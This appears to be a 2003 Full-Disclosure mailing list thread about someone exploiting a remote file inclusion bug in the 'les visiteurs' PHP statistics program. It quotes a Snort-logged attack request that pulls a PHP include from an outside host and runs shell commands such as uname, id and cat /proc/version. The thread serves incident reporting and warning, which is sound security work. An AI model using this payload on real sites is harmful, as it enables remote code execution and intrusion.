[Full-Disclosure] file inclusion (les visiteurs)
gazpa
gazpa at euskalnet.net
Tue Dec 2 00:09:51 GMT 2003
Hi Lorenzo,
First there isn't *their server*. It's other stuff server
(c2r.canalforbid.org).
Second, they use this server to serve an include file (hax.gif), a php
include to *inject* in the buggy 'les visiteurs' (web statistics
program) remotely and execute shell commands.
And I don't thing they are kiddies, if they wrote 'hax.gif', like it seems.
Don't blame people who is only intending to advise people about a bug
that is being exploited.
Lorenzo Hernandez Garcia-Hierro wrote:
>Hi Daniel ,
>They are kiddies... :(
>I was looking the files and there are only high-risk-rated exploits
>downloaded from packet storm , ptrace , etc .
>And they are running remote php shells in their server.... xD
>
>See you in the IRC tonight ?
>
>
>
>>"Evert Daman" <evert at digipix.org> wrote:
>>
>>
>>
>>>last night snort detected this request:
>>>
>>>GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
>>>org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
>>>
>>>because i patched 'les visiteurs' as described by 'matthieu peschaud'
>>>on bugtraq on the 26 of october nothing happend, but it looks like someone is trying to exploit this bug.
>>>just want to mention it to this wonderfull list :)
>>>
>>>
>>>
Full-Disclosure is hosted and sponsored by Secunia.